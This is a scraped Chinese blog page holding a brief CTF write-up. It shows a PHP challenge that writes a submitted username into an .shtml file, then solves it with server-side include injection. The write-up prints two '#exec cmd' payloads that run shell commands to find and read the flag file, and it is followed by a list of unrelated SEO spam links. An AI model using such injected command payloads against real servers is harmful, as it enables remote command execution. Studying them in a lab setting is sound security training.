当前位置: 首页 > wzjs >正文

网站建设找北冥有鱼线下推广渠道和方式

网站建设找北冥有鱼,线下推广渠道和方式,web制作网页实验步骤,wordpress 中文图片进入靶场 有个文件 和之前一道题如出一辙 <?php// 开启输出缓冲&#xff0c;将后续所有的输出内容先暂存到缓冲区&#xff0c;而不是直接发送到浏览器ob_start();/*** 生成一个基于随机字符串和唯一标识符的哈希值* return string 返回生成的 sha1 哈希值*/function get_…

进入靶场

有个文件

 和之前一道题如出一辙

<?php// 开启输出缓冲,将后续所有的输出内容先暂存到缓冲区,而不是直接发送到浏览器ob_start();/*** 生成一个基于随机字符串和唯一标识符的哈希值* @return string 返回生成的 sha1 哈希值*/function get_hash(){// 定义一个包含大写字母、小写字母、数字和一些特殊字符的字符集$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';// 从字符集中随机选取 5 个字符并拼接成一个随机字符串$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)]; // Random 5 times// 生成一个基于当前时间戳的唯一标识符,并与随机字符串拼接$content = uniqid().$random;// 对拼接后的字符串进行 sha1 哈希处理,并返回哈希值return sha1($content); }// 设置响应的 HTTP 头,指定内容类型为 HTML,字符编码为 UTF-8header("Content-Type: text/html;charset=utf-8");// 检查是否通过 POST 方法提交了 'username' 字段,并且该字段不为空if(isset($_POST['username']) && $_POST['username'] != '' ){// 定义一个管理员密码的 md5 哈希值的前 6 位作为验证依据$admin = '6d0bc1';// 计算用户提交的密码的 md5 哈希值,并截取前 6 位,与预设的验证值进行比较if ( $admin == substr(md5($_POST['password']),0,6)) {// 如果验证通过,弹出一个 JavaScript 警告框,提示欢迎进入管理系统echo "<script>alert('[+] Welcome to manage system')</script>";// 生成一个随机的文件名,文件扩展名为 .shtml,存放在 public 目录下$file_shtml = "public/".get_hash().".shtml";// 以写入模式打开文件,如果无法打开则终止程序并输出错误信息$shtml = fopen($file_shtml, "w") or die("Unable to open file!");// 定义要写入文件的 HTML 内容,包含欢迎信息和用户提交的用户名$text = '<!-- 这里可以补充完整的 HTML 结构和样式 --><!-- 这里可以补充完整的 HTML 结构和样式 --><h1>Hello,'.$_POST['username'].'</h1><!-- 这里可以补充完整的 HTML 结构和样式 --><!-- 这里可以补充完整的 HTML 结构和样式 -->';// 将定义好的文本内容写入文件fwrite($shtml,$text);// 关闭文件句柄,释放资源fclose($shtml);// 这里输出提示信息,表明可能存在 HTTP 头错误,但不清楚具体逻辑echo "[!] Header  error ...";} else {// 如果验证不通过,弹出一个 JavaScript 警告框,提示登录失败echo "<script>alert('[!] Failed')</script>";}} else {// 如果没有提交 'username' 字段或该字段为空,可以在这里添加相应的处理逻辑// 例如提示用户输入用户名}// 可以在这里添加一些收尾的代码,例如刷新输出缓冲区等
?>

没得到什么信息

抓包

<!--#exec cmd="find / -name flag*"--> 

 

<!--#exec cmd="tac /var/www/html/flag_990c66bf85a09c664f0b6741840499b2"--> 

 

http://www.dtcms.com/wzjs/454436.html

相关文章:

  • 为什么很多公司做网站建设推广普通话手抄报图片
  • 重庆企业网站建设公司网站降权查询工具
  • 网址大全4399百度seo排名优化技巧分享
  • 建设企业网银u盾网站打不开网络推广的网站有哪些
  • 作词做曲网站今日足球赛事推荐
  • 苏州高端网站设计制作淘宝店铺怎么推广和引流
  • 网站建设 济南广西网络优化seo
  • 设计用的报价网站seo搜索如何优化
  • 办个网站需要投资多少郑州seo网站管理
  • wordpress文章出问题新乡seo优化
  • 批发网站怎么做站长工具a级
  • 专业微网站建设公司哪家好百度统计app下载
  • 柳州网站建设价格苏州关键词排名系统
  • 深圳竞价网站谁有推荐的网址
  • 扬中网站建设案例百度免费发布信息
  • 实训课做一个网站怎么做googleplay安卓版下载
  • 南阳企业做网站营销推广渠道有哪些
  • 网站后台怎么做alt标签铜川网站seo
  • 搭建cms网站免费舆情网站
  • 上海做门户网站的公司网站内链优化
  • 瑞安这边有没有做网站的辽宁和生活app下载安装
  • 英语网站建设策划书疫情防控最新数据
  • 买布自己做网站衣服的seo学徒是做什么
  • 学院网站建设 好处如何seo网站推广
  • 嘉兴网嘉兴网站建设企业如何开展网络营销
  • 常州新北区有做淘宝网站策划的吗百度竞价投放
  • 合肥网站seo诊断重庆旅游seo整站优化
  • 做电影网站怎么赚钱竞价推广外包托管
  • 长春火车站什么时候通车引擎优化seo
  • 小昆山网站建设广东东莞最新情况